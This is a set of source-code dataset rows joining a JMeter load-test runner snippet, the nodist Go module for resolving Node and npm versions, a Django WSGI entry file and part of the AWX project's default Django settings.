os.makedirs(cs.ARGUMENTS_JMETER_RESULTS_PATH_VALUE + '/' + cs.ARGUMENTS_JMETER_SCENARIO_ID_VALUE)
jmeter_results_file_path = cs.ARGUMENTS_JMETER_RESULTS_PATH_VALUE + '/' + cs.ARGUMENTS_JMETER_SCENARIO_ID_VALUE + \
'/' + scenario_id_value + "_" + cs.ARGUMENTS_JMETER_ROUND_ID_VALUE + ".jtl"
config_variables = ['-J' + cs.ARGUMENTS_JMETER_HTTP_HOST_VAR + '=' + cs.ARGUMENTS_JMETER_HTTP_HOST_VALUE,
'-J' + cs.ARGUMENTS_JMETER_HTTP_PORT_VAR + '=' + cs.ARGUMENTS_JMETER_HTTP_PORT_VALUE,
'-J' + cs.ARGUMENTS_JMETER_HTTP_PATH_VAR + '=' + cs.ARGUMENTS_JMETER_HTTP_PATH_VALUE,
'-J' + cs.ARGUMENTS_JMETER_NUMBER_THREADS_VAR + '=' + concurrent_users,
'-J' + cs.ARGUMENTS_JMETER_LOOP_PER_THREAD_VAR + '=' + thread_loop,
'-J' + cs.ARGUMENTS_JMETER_THREAD_RAMPUP_VAR + '=' + thread_rampup,
'-J' + cs.ARGUMENTS_JMETER_WORKLOAD_CSV_PATH_VAR + '=' + workload_file_path,
'-J' + cs.ARGUMENTS_JMETER_WORKLOAD_CSV_NUM_ROWS_VAR + '=' + workload_file_num_csv_rows,
'-J' + cs.ARGUMENTS_JMETER_DELAY_BETWEEN_REQUESTS_VAR + '=' + cs.ARGUMENTS_JMETER_DELAY_BETWEEN_REQUESTS_VALUE,
'-J' + cs.ARGUMENTS_JMETER_ROUND_ID_VAR + '=' + cs.ARGUMENTS_JMETER_ROUND_ID_VALUE,
'-J' + cs.ARGUMENTS_JMETER_SCENARIO_ID_VAR + '=' + scenario_id_value,
'-J' + cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_NAMES_VAR + "=" + cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_NAMES_VALUE,
'-J' + cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_DELIMITER_VAR + "=" + cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_DELIMITER_VALUE]
jmeter_jar_path = [cs.CONFIG_JMETER_PATH_VALUE + '/bin/ApacheJMeter.jar']
env = dict(os.environ)
env['JAVA_OPTS'] = '-Xmx8192m -Xms1024m'
print "Starting Experiment with load " + scenario_id_value
subprocess.call(['java', '-jar'] + jmeter_jar_path + ['-n'] + config_variables + ['-t', jmeter_test_plan, '-l', jmeter_results_file_path])
print "Experiment Finished. Results in " + jmeter_results_file_path
count_workload_file_list += 1
# Aggregate the summary report files
# 1) Be able to process the results for each day. The output generated file must follow the same file naming property as the generated load
# 2) Extract Statistics, e.g. mean response time, mean number of errors
#with open('resources/arguments.properties.template') as fp:
# properties = jprops.load_properties(fp)
#x = {'y': '1', 'z': '2'}
#with open('out.properties', 'w') as fp:
# jprops.store_properties(fp, x)
#print properties | []
| []
| []
| [] | [] | python | 0 | 0 | |
src/lib/nodist/nodist.go | package nodist
import (
"errors"
"os"
"io/ioutil"
"strings"
"sort"
"encoding/json"
"github.com/marcelklehr/semver"
)
import . "github.com/computes/go-debug"
var debug = Debug("nodist:shim")
const pathSep = string(os.PathSeparator)
func GetCurrentNodeVersionSpec(currentDir string) (spec string) {
// Determine version spec
var v string
clever := os.Getenv("NODIST_INSPECT_PACKAGEJSON");
if v = os.Getenv("NODE_VERSION"); v != "" {
spec = v
debug("NODE_VERSION found:'%s'", spec)
} else
if v = os.Getenv("NODIST_NODE_VERSION"); v != "" {
spec = v
debug("NODIST_NODE_VERSION found:'%s'", spec)
} else
if v, err := getLocalEngineNode(currentDir); clever != "" && err == nil && strings.Trim(string(v), " \r\n") != "" {
spec = v
debug("Target engine found:'%s'", spec)
} else
if v, localFile, err := getLocalNodeVersion(currentDir); err == nil && strings.Trim(string(v), " \r\n") != "" {
spec = string(v)
debug("Local file found:'%s' @ %s", spec, localFile)
} else
if v, err := ioutil.ReadFile(os.Getenv("NODIST_PREFIX")+"\\.node-version-global"); err == nil {
spec = string(v)
debug("Global file found: '%s'", spec)
}
spec = strings.Trim(spec, "v \r\n")
return
}
func GetCurrentNpmVersionSpec(currentDir string) (spec string) {
// Determine version spec
var v string
clever := os.Getenv("NODIST_INSPECT_PACKAGEJSON");
if v = os.Getenv("NODIST_NPM_VERSION"); v != "" {
spec = v
debug("NODIST_NPM_VERSION found:'%s'", spec)
} else
if v, err := getLocalEngineNpm(currentDir); clever != "" && err == nil && strings.Trim(string(v), " \r\n") != "" {
spec = v
debug("Target engine npm spec found:'%s'", spec)
} else
if v, localFile, err := getLocalNpmVersion(currentDir); err == nil && strings.Trim(string(v), " \r\n") != "" {
spec = string(v)
debug("Local file with npm spec found:'%s' @ %s", spec, localFile)
} else
if v, err := ioutil.ReadFile(os.Getenv("NODIST_PREFIX")+"\\.npm-version-global"); err == nil {
spec = string(v)
debug("Global file found: '%s'", spec)
}
spec = strings.Trim(spec, "v \r\n")
return
}
func ResolveNodeVersion(spec string) (version string, err error){
// Find an installed version matching the spec...
installed, err := GetInstalledNodeVersions()
if err != nil {
return
}
version, err = resolveVersion(spec, installed)
return
}
func GetInstalledNodeVersions() (versions []*semver.Version, err error) {
// Determine architecture
x64 := false
if wantX64 := os.Getenv("NODIST_X64"); wantX64 != "" {
x64 = (wantX64 == "1")
}
// construct path to version dir
path := os.Getenv("NODIST_PREFIX")+"/v"
if x64 {
path += "-x64"
}
versions, err = getInstalledVersions(path)
return
}
func ResolveNpmVersion(spec string, nodeVersion string) (version string, err error){
// Find an installed version matching the spec...
installed, err := GetInstalledNpmVersions()
if err != nil {
return
}
if spec == "match" {
spec, err = getMatchingNpmVersion(nodeVersion)
if err != nil {
return
}
// we feed this result to resolveVersion, too, because we need
// to see if it is actually installed
}
version, err = resolveVersion(spec, installed)
return
}
func resolveVersion(spec string, installed []*semver.Version) (version string, err error) {
var constraint *semver.Constraints
if spec != "latest" {
constraint, err = semver.NewConstraint(spec)
if err != nil {
return
}
}
if spec == "latest" {
version = installed[0].String()
}else{
for _, v := range installed {
debug("checking %s against %s", v.String(), spec)
if constraint.Check(v) {
version = v.String()
break
}
}
}
if version == "" {
err = errors.New("Couldn't find any matching version")
}
return
}
type Version struct {
Version string
Npm string
}
func getMatchingNpmVersion(nodeVersion string) (version string, err error) {
file := os.Getenv("NODIST_PREFIX")+pathSep+"versions.json"
rawJSON, err := ioutil.ReadFile(file)
if err != nil {
return
}
var versions []Version
err = json.Unmarshal(rawJSON, &versions)
if err != nil {
return
}
for i:=0; i < len(versions); i++ {
if versions[i].Version[1:] != nodeVersion {
continue
}
version = versions[i].Npm
return
}
err = errors.New("No npm version found that matches node version "+nodeVersion)
return
}
func GetInstalledNpmVersions() (versions []*semver.Version, err error) {
// construct path to version dir
path := os.Getenv("NODIST_PREFIX")+"/npmv"
versions, err = getInstalledVersions(path)
return
}
func getInstalledVersions(path string) (versions []*semver.Version, err error) {
entries, err := ioutil.ReadDir(path)
if err != nil {
return
}
versions = make([]*semver.Version, 0)
for _, entry := range entries {
if !entry.IsDir() {
continue
}
v, err := semver.NewVersion(entry.Name())
if err == nil {
versions = append(versions, v)
}
}
sort.Sort(sort.Reverse(semver.Collection(versions)))
return
}
func getLocalNodeVersion(dir string) (version string, file string, err error) {
version, file, err = getLocalVersion(dir, ".node-version")
return
}
func getLocalNpmVersion(dir string) (version string, file string, err error) {
version, file, err = getLocalVersion(dir, ".npm-version")
return
}
func getLocalVersion(dir string, filename string) (version string, file string, returnedError error) {
dirSlice := strings.Split(dir, pathSep) // D:\Programme\nodist => [D:, Programme, nodist]
for len(dirSlice) != 1 {
dir = strings.Join(dirSlice, pathSep)
file = dir+pathSep+filename
v, err := ioutil.ReadFile(file);
if err == nil {
version = string(v)
return
}
if !os.IsNotExist(err) {
returnedError = err // some other error.. bad luck.
return
}
// `$ cd ..`
dirSlice = dirSlice[:len(dirSlice)-1] // pop the last dir
}
version = ""
return
}
func getLocalEngineNode(dir string) (spec string, err error) {
packageJSON, err := getLocalPackageJSON(dir)
if err != nil {
return
}
spec = packageJSON.Engines.Node
return
}
func getLocalEngineNpm(dir string) (spec string, err error) {
packageJSON, err := getLocalPackageJSON(dir)
if err != nil {
return
}
spec = packageJSON.Engines.Npm
return
}
func getLocalPackageJSON(dir string) (packageJSON PackageJSON, returnedError error) {
debug("getTargetEngine: targetDir: %s", dir)
dirSlice := strings.Split(dir, pathSep) // D:\Programme\nodist => [D:, Programme, nodist]
for len(dirSlice) != 1 {
dir = strings.Join(dirSlice, pathSep)
file := dir+"\\package.json"
rawPackageJSON, err := ioutil.ReadFile(file);
debug("getTargetEngine: ReadFile %s", file)
if err == nil {
// no error handling for parsing, cause we don't want to use a different package.json if we've already found one
packageJSON, returnedError = parsePackageJSON(rawPackageJSON)
return
}
if !os.IsNotExist(err) {
returnedError = err // some other error.. bad luck.
return
}
// `$ cd ..`
dirSlice = dirSlice[:len(dirSlice)-1] // pop the last dir
}
return
}
type PackageJSON struct {
Engines struct {
Npm string
Node string
}
}
func parsePackageJSON(rawPackageJSON []byte) (packageJSON PackageJSON, err error) {
err = json.Unmarshal(rawPackageJSON, &packageJSON)
if err == nil {
debug("parsePackageJSON: %+v", packageJSON)
return
}
debug("parsePackageJSON: error: %s", err.Error())
// incorrect JSON -- bad luck
return
}
| [
"\"NODIST_INSPECT_PACKAGEJSON\"",
"\"NODE_VERSION\"",
"\"NODIST_NODE_VERSION\"",
"\"NODIST_PREFIX\"",
"\"NODIST_INSPECT_PACKAGEJSON\"",
"\"NODIST_NPM_VERSION\"",
"\"NODIST_PREFIX\"",
"\"NODIST_X64\"",
"\"NODIST_PREFIX\"",
"\"NODIST_PREFIX\"",
"\"NODIST_PREFIX\""
]
| []
| [
"NODIST_NPM_VERSION",
"NODIST_NODE_VERSION",
"NODIST_PREFIX",
"NODIST_INSPECT_PACKAGEJSON",
"NODE_VERSION",
"NODIST_X64"
]
| [] | ["NODIST_NPM_VERSION", "NODIST_NODE_VERSION", "NODIST_PREFIX", "NODIST_INSPECT_PACKAGEJSON", "NODE_VERSION", "NODIST_X64"] | go | 6 | 0 | |
djorg/wsgi.py | """
WSGI config for djorg project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djorg.settings")
application = get_wsgi_application() | []
| []
| []
| [] | [] | python | 0 | 0 | |
awx/settings/defaults.py | # Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
import os
import re # noqa
import sys
from datetime import timedelta
# global settings
from django.conf import global_settings
# ugettext lazy
from django.utils.translation import ugettext_lazy as _
# Update this module's local settings from the global settings module.
this_module = sys.modules[__name__]
for setting in dir(global_settings):
if setting == setting.upper():
setattr(this_module, setting, getattr(global_settings, setting))
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
def is_testing(argv=None):
import sys
'''Return True if running django or py.test unit tests.'''
if 'PYTEST_CURRENT_TEST' in os.environ.keys():
return True
argv = sys.argv if argv is None else argv
if len(argv) >= 1 and ('py.test' in argv[0] or 'py/test.py' in argv[0]):
return True
elif len(argv) >= 2 and argv[1] == 'test':
return True
return False
def IS_TESTING(argv=None):
return is_testing(argv)
if "pytest" in sys.modules:
from unittest import mock
with mock.patch('__main__.__builtins__.dir', return_value=[]):
import ldap
else:
import ldap
DEBUG = True
SQL_DEBUG = DEBUG
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'awx.sqlite3'),
'ATOMIC_REQUESTS': True,
'TEST': {
# Test database cannot be :memory: for inventory tests.
'NAME': os.path.join(BASE_DIR, 'awx_test.sqlite3'),
},
}
}
AWX_CONTAINER_GROUP_K8S_API_TIMEOUT = 10
AWX_CONTAINER_GROUP_POD_LAUNCH_RETRIES = 100
AWX_CONTAINER_GROUP_POD_LAUNCH_RETRY_DELAY = 5
AWX_CONTAINER_GROUP_DEFAULT_NAMESPACE = 'default'
AWX_CONTAINER_GROUP_DEFAULT_IMAGE = 'ansible/ansible-runner'
# Internationalization
# https://docs.djangoproject.com/en/dev/topics/i18n/
#
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'UTC'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
USE_TZ = True
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'ui', 'static'),
os.path.join(BASE_DIR, 'static'),
)
# Absolute filesystem path to the directory where static file are collected via
# the collectstatic command.
STATIC_ROOT = os.path.join(BASE_DIR, 'public', 'static')
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/dev/howto/static-files/
STATIC_URL = '/static/'
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(BASE_DIR, 'public', 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/media/'
LOGIN_URL = '/api/login/'
# Absolute filesystem path to the directory to host projects (with playbooks).
# This directory should not be web-accessible.
PROJECTS_ROOT = os.path.join(BASE_DIR, 'projects')
# Absolute filesystem path to the directory for job status stdout (default for
# development and tests, default for production defined in production.py). This
# directory should not be web-accessible
JOBOUTPUT_ROOT = os.path.join(BASE_DIR, 'job_output')
# Absolute filesystem path to the directory to store logs
LOG_ROOT = os.path.join(BASE_DIR)
# The heartbeat file for the tower scheduler
SCHEDULE_METADATA_LOCATION = os.path.join(BASE_DIR, '.tower_cycle')
# Django gettext files path: locale/<lang-code>/LC_MESSAGES/django.po, django.mo
LOCALE_PATHS = (
os.path.join(BASE_DIR, 'locale'),
)
# Graph of resources that can have named-url
NAMED_URL_GRAPH = {}
# Maximum number of the same job that can be waiting to run when launching from scheduler
# Note: This setting may be overridden by database settings.
SCHEDULE_MAX_JOBS = 10
SITE_ID = 1
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'p7z7g1ql4%6+(6nlebb6hdk7sd^&fnjpal308%n%+p^_e6vo1y'
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# HTTP headers and meta keys to search to determine remote host name or IP. Add
# additional items to this list, such as "HTTP_X_FORWARDED_FOR", if behind a
# reverse proxy.
REMOTE_HOST_HEADERS = ['REMOTE_ADDR', 'REMOTE_HOST']
# If Tower is behind a reverse proxy/load balancer, use this setting to
# whitelist the proxy IP addresses from which Tower should trust custom
# REMOTE_HOST_HEADERS header values
# REMOTE_HOST_HEADERS = ['HTTP_X_FORWARDED_FOR', ''REMOTE_ADDR', 'REMOTE_HOST']
# PROXY_IP_WHITELIST = ['10.0.1.100', '10.0.1.101']
# If this setting is an empty list (the default), the headers specified by
# REMOTE_HOST_HEADERS will be trusted unconditionally')
PROXY_IP_WHITELIST = []
CUSTOM_VENV_PATHS = []
# Note: This setting may be overridden by database settings.
STDOUT_MAX_BYTES_DISPLAY = 1048576
# Returned in the header on event api lists as a recommendation to the UI
# on how many events to display before truncating/hiding
MAX_UI_JOB_EVENTS = 4000
# Returned in index.html, tells the UI if it should make requests
# to update job data in response to status changes websocket events
UI_LIVE_UPDATES_ENABLED = True
# The maximum size of the ansible callback event's res data structure
# beyond this limit and the value will be removed
MAX_EVENT_RES_DATA = 700000
# Note: This setting may be overridden by database settings.
EVENT_STDOUT_MAX_BYTES_DISPLAY = 1024
# The amount of time before a stdout file is expired and removed locally
# Note that this can be recreated if the stdout is downloaded
LOCAL_STDOUT_EXPIRE_TIME = 2592000
# The number of processes spawned by the callback receiver to process job
# events into the database
JOB_EVENT_WORKERS = 4
# The maximum size of the job event worker queue before requests are blocked
JOB_EVENT_MAX_QUEUE_SIZE = 10000
# The number of job events to migrate per-transaction when moving from int -> bigint
JOB_EVENT_MIGRATION_CHUNK_SIZE = 1000000
# Disallow sending session cookies over insecure connections
SESSION_COOKIE_SECURE = True
# Seconds before sessions expire.
# Note: This setting may be overridden by database settings.
SESSION_COOKIE_AGE = 1800
# Maximum number of per-user valid, concurrent sessions.
# -1 is unlimited
# Note: This setting may be overridden by database settings.
SESSIONS_PER_USER = -1
CSRF_USE_SESSIONS = False
# Disallow sending csrf cookies over insecure connections
CSRF_COOKIE_SECURE = True
# Limit CSRF cookies to browser sessions
CSRF_COOKIE_AGE = None
TEMPLATES = [
{
'NAME': 'default',
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'OPTIONS': {
'debug': DEBUG,
'context_processors': [# NOQA
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'awx.ui.context_processors.settings',
'awx.ui.context_processors.version',
'social_django.context_processors.backends',
'social_django.context_processors.login_redirect',
],
'loaders': [(
'django.template.loaders.cached.Loader',
('django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',),
)],
'builtins': ['awx.main.templatetags.swagger'],
},
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
},
]
ROOT_URLCONF = 'awx.urls'
WSGI_APPLICATION = 'awx.wsgi.application'
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'oauth2_provider',
'rest_framework',
'django_extensions',
'channels',
'polymorphic',
'taggit',
'social_django',
'corsheaders',
'awx.conf',
'awx.main',
'awx.api',
'awx.ui',
'awx.sso',
'solo'
]
INTERNAL_IPS = ('127.0.0.1',)
MAX_PAGE_SIZE = 200
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'awx.api.pagination.Pagination',
'PAGE_SIZE': 25,
'DEFAULT_AUTHENTICATION_CLASSES': (
'awx.api.authentication.LoggedOAuth2Authentication',
'awx.api.authentication.SessionAuthentication',
'awx.api.authentication.LoggedBasicAuthentication',
),
'DEFAULT_PERMISSION_CLASSES': (
'awx.api.permissions.ModelAccessPermission',
),
'DEFAULT_FILTER_BACKENDS': (
'awx.api.filters.TypeFilterBackend',
'awx.api.filters.FieldLookupBackend',
'rest_framework.filters.SearchFilter',
'awx.api.filters.OrderByBackend',
),
'DEFAULT_PARSER_CLASSES': (
'awx.api.parsers.JSONParser',
),
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'awx.api.renderers.BrowsableAPIRenderer',
),
'DEFAULT_METADATA_CLASS': 'awx.api.metadata.Metadata',
'EXCEPTION_HANDLER': 'awx.api.views.api_exception_handler',
'VIEW_DESCRIPTION_FUNCTION': 'awx.api.generics.get_view_description',
'NON_FIELD_ERRORS_KEY': '__all__',
'DEFAULT_VERSION': 'v2',
# For swagger schema generation
# see https://github.com/encode/django-rest-framework/pull/6532
'DEFAULT_SCHEMA_CLASS': 'rest_framework.schemas.AutoSchema',
#'URL_FORMAT_OVERRIDE': None,
}
AUTHENTICATION_BACKENDS = (
'awx.sso.backends.LDAPBackend',
'awx.sso.backends.LDAPBackend1',
'awx.sso.backends.LDAPBackend2',
'awx.sso.backends.LDAPBackend3',
'awx.sso.backends.LDAPBackend4',
'awx.sso.backends.LDAPBackend5',
'awx.sso.backends.RADIUSBackend',
'awx.sso.backends.TACACSPlusBackend',
'social_core.backends.google.GoogleOAuth2',
'social_core.backends.github.GithubOAuth2',
'social_core.backends.github.GithubOrganizationOAuth2',
'social_core.backends.github.GithubTeamOAuth2',
'social_core.backends.azuread.AzureADOAuth2',
'awx.sso.backends.SAMLAuth',
'django.contrib.auth.backends.ModelBackend',
)
# Django OAuth Toolkit settings
OAUTH2_PROVIDER_APPLICATION_MODEL = 'main.OAuth2Application'
OAUTH2_PROVIDER_ACCESS_TOKEN_MODEL = 'main.OAuth2AccessToken'
OAUTH2_PROVIDER_REFRESH_TOKEN_MODEL = 'oauth2_provider.RefreshToken'
OAUTH2_PROVIDER = {'ACCESS_TOKEN_EXPIRE_SECONDS': 31536000000,
'AUTHORIZATION_CODE_EXPIRE_SECONDS': 600,
'REFRESH_TOKEN_EXPIRE_SECONDS': 2628000}
ALLOW_OAUTH2_FOR_EXTERNAL_USERS = False
# LDAP server (default to None to skip using LDAP authentication).
# Note: This setting may be overridden by database settings.
AUTH_LDAP_SERVER_URI = None
# Disable LDAP referrals by default (to prevent certain LDAP queries from
# hanging with AD).
# Note: This setting may be overridden by database settings.
AUTH_LDAP_CONNECTION_OPTIONS = {
ldap.OPT_REFERRALS: 0,
ldap.OPT_NETWORK_TIMEOUT: 30
}
# Radius server settings (default to empty string to skip using Radius auth).
# Note: These settings may be overridden by database settings.
RADIUS_SERVER = ''
RADIUS_PORT = 1812
RADIUS_SECRET = ''
# TACACS+ settings (default host to empty string to skip using TACACS+ auth).
# Note: These settings may be overridden by database settings.
TACACSPLUS_HOST = ''
TACACSPLUS_PORT = 49
TACACSPLUS_SECRET = ''
TACACSPLUS_SESSION_TIMEOUT = 5
TACACSPLUS_AUTH_PROTOCOL = 'ascii'
# Enable / Disable HTTP Basic Authentication used in the API browser
# Note: Session limits are not enforced when using HTTP Basic Authentication.
# Note: This setting may be overridden by database settings.
AUTH_BASIC_ENABLED = True
# If set, specifies a URL that unauthenticated users will be redirected to
# when trying to access a UI page that requries authentication.
LOGIN_REDIRECT_OVERRIDE = ''
# If set, serve only minified JS for UI.
USE_MINIFIED_JS = False
# Default to skipping isolated host key checking (the initial connection will
# hang on an interactive "The authenticity of host example.org can't be
# established" message)
AWX_ISOLATED_HOST_KEY_CHECKING = False
# The number of seconds to sleep between status checks for jobs running on isolated nodes
AWX_ISOLATED_CHECK_INTERVAL = 30
# The timeout (in seconds) for launching jobs on isolated nodes
AWX_ISOLATED_LAUNCH_TIMEOUT = 600
# Ansible connection timeout (in seconds) for communicating with isolated instances
AWX_ISOLATED_CONNECTION_TIMEOUT = 10
# The time (in seconds) between the periodic isolated heartbeat status check
AWX_ISOLATED_PERIODIC_CHECK = 600
# Verbosity level for isolated node management tasks
AWX_ISOLATED_VERBOSITY = 0
# Memcached django cache configuration
# CACHES = {
# 'default': {
# 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
# 'LOCATION': '127.0.0.1:11211',
# 'TIMEOUT': 864000,
# 'KEY_PREFIX': 'tower_dev',
# }
# }
DEVSERVER_DEFAULT_ADDR = '0.0.0.0'
DEVSERVER_DEFAULT_PORT = '8013'
# Set default ports for live server tests.
os.environ.setdefault('DJANGO_LIVE_TEST_SERVER_ADDRESS', 'localhost:9013-9199')
BROKER_DURABILITY = True
BROKER_POOL_LIMIT = None
BROKER_URL = 'unix:///var/run/redis/redis.sock'
BROKER_TRANSPORT_OPTIONS = {}
CELERYBEAT_SCHEDULE = {
'tower_scheduler': {
'task': 'awx.main.tasks.awx_periodic_scheduler',
'schedule': timedelta(seconds=30),
'options': {'expires': 20,}
},
'cluster_heartbeat': {
'task': 'awx.main.tasks.cluster_node_heartbeat',
'schedule': timedelta(seconds=60),
'options': {'expires': 50,}
},
'gather_analytics': {
'task': 'awx.main.tasks.gather_analytics',
'schedule': timedelta(minutes=5)
},
'task_manager': {
'task': 'awx.main.scheduler.tasks.run_task_manager',
'schedule': timedelta(seconds=20),
'options': {'expires': 20}
},
'k8s_reaper': {
'task': 'awx.main.tasks.awx_k8s_reaper',
'schedule': timedelta(seconds=60),
'options': {'expires': 50,}
},
# 'isolated_heartbeat': set up at the end of production.py and development.py
}
# Django Caching Configuration
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': 'memcached:11211',
},
}
# Social Auth configuration.
SOCIAL_AUTH_STRATEGY = 'social_django.strategy.DjangoStrategy'
SOCIAL_AUTH_STORAGE = 'social_django.models.DjangoStorage'
SOCIAL_AUTH_USER_MODEL = AUTH_USER_MODEL # noqa
_SOCIAL_AUTH_PIPELINE_BASE = (
'social_core.pipeline.social_auth.social_details',
'social_core.pipeline.social_auth.social_uid',
'social_core.pipeline.social_auth.auth_allowed',
'social_core.pipeline.social_auth.social_user',
'social_core.pipeline.user.get_username',
'social_core.pipeline.social_auth.associate_by_email',
'social_core.pipeline.user.create_user',
'awx.sso.pipeline.check_user_found_or_created',
'social_core.pipeline.social_auth.associate_user',
'social_core.pipeline.social_auth.load_extra_data',
'awx.sso.pipeline.set_is_active_for_new_user',
'social_core.pipeline.user.user_details',
'awx.sso.pipeline.prevent_inactive_login',
)
SOCIAL_AUTH_PIPELINE = _SOCIAL_AUTH_PIPELINE_BASE + (
'awx.sso.pipeline.update_user_orgs',
'awx.sso.pipeline.update_user_teams',
)
SOCIAL_AUTH_SAML_PIPELINE = _SOCIAL_AUTH_PIPELINE_BASE + (
'awx.sso.pipeline.update_user_orgs_by_saml_attr',
'awx.sso.pipeline.update_user_teams_by_saml_attr',
'awx.sso.pipeline.update_user_orgs',
'awx.sso.pipeline.update_user_teams',
)
SOCIAL_AUTH_LOGIN_URL = '/'
SOCIAL_AUTH_LOGIN_REDIRECT_URL = '/sso/complete/'
SOCIAL_AUTH_LOGIN_ERROR_URL = '/sso/error/'
SOCIAL_AUTH_INACTIVE_USER_URL = '/sso/inactive/'
SOCIAL_AUTH_RAISE_EXCEPTIONS = False
SOCIAL_AUTH_USERNAME_IS_FULL_EMAIL = False
#SOCIAL_AUTH_SLUGIFY_USERNAMES = True
SOCIAL_AUTH_CLEAN_USERNAMES = True
SOCIAL_AUTH_SANITIZE_REDIRECTS = True
SOCIAL_AUTH_REDIRECT_IS_HTTPS = False
# Note: These settings may be overridden by database settings.
SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = ''
SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = ''
SOCIAL_AUTH_GOOGLE_OAUTH2_SCOPE = ['profile']
SOCIAL_AUTH_GITHUB_KEY = ''
SOCIAL_AUTH_GITHUB_SECRET = ''
SOCIAL_AUTH_GITHUB_SCOPE = ['user:email', 'read:org']
SOCIAL_AUTH_GITHUB_ORG_KEY = ''
SOCIAL_AUTH_GITHUB_ORG_SECRET = ''
SOCIAL_AUTH_GITHUB_ORG_NAME = ''
SOCIAL_AUTH_GITHUB_ORG_SCOPE = ['user:email', 'read:org']
SOCIAL_AUTH_GITHUB_TEAM_KEY = ''
SOCIAL_AUTH_GITHUB_TEAM_SECRET = ''
SOCIAL_AUTH_GITHUB_TEAM_ID = ''
SOCIAL_AUTH_GITHUB_TEAM_SCOPE = ['user:email', 'read:org']
SOCIAL_AUTH_AZUREAD_OAUTH2_KEY = ''
SOCIAL_AUTH_AZUREAD_OAUTH2_SECRET = ''
SOCIAL_AUTH_SAML_SP_ENTITY_ID = ''
SOCIAL_AUTH_SAML_SP_PUBLIC_CERT = ''
SOCIAL_AUTH_SAML_SP_PRIVATE_KEY = ''
SOCIAL_AUTH_SAML_ORG_INFO = {}
SOCIAL_AUTH_SAML_TECHNICAL_CONTACT = {}
SOCIAL_AUTH_SAML_SUPPORT_CONTACT = {}
SOCIAL_AUTH_SAML_ENABLED_IDPS = {}
SOCIAL_AUTH_SAML_ORGANIZATION_ATTR = {}
SOCIAL_AUTH_SAML_TEAM_ATTR = {}
# Any ANSIBLE_* settings will be passed to the task runner subprocess
# environment
# Do not want AWX to ask interactive questions and want it to be friendly with
# reprovisioning
ANSIBLE_HOST_KEY_CHECKING = False
# RHEL has too old of an SSH so ansible will select paramiko and this is VERY
# slow.
ANSIBLE_PARAMIKO_RECORD_HOST_KEYS = False
# Force ansible in color even if we don't have a TTY so we can properly colorize
# output
ANSIBLE_FORCE_COLOR = True
# If tmp generated inventory parsing fails (error state), fail playbook fast
ANSIBLE_INVENTORY_UNPARSED_FAILED = True
# Additional environment variables to be passed to the ansible subprocesses
AWX_TASK_ENV = {}
# Rebuild Host Smart Inventory memberships.
AWX_REBUILD_SMART_MEMBERSHIP = False
# By default, allow arbitrary Jinja templating in extra_vars defined on a Job Template
ALLOW_JINJA_IN_EXTRA_VARS = 'template'
# Run project updates with extra verbosity
PROJECT_UPDATE_VVV = False
# Enable dynamically pulling roles from a requirement.yml file
# when updating SCM projects
# Note: This setting may be overridden by database settings.
AWX_ROLES_ENABLED = True
# Enable dynamically pulling collections from a requirement.yml file
# when updating SCM projects
# Note: This setting may be overridden by database settings.
AWX_COLLECTIONS_ENABLED = True
# Settings for primary galaxy server, should be set in the UI
PRIMARY_GALAXY_URL = ''
PRIMARY_GALAXY_USERNAME = ''
PRIMARY_GALAXY_TOKEN = ''
PRIMARY_GALAXY_PASSWORD = ''
PRIMARY_GALAXY_AUTH_URL = ''
# Settings for the public galaxy server(s).
PUBLIC_GALAXY_ENABLED = True
PUBLIC_GALAXY_SERVER = {
'id': 'galaxy',
'url': 'https://galaxy.ansible.com'
}
# Applies to any galaxy server
GALAXY_IGNORE_CERTS = False
# List of dicts of fallback (additional) Galaxy servers. If configured, these
# will be higher precedence than public Galaxy, but lower than primary Galaxy.
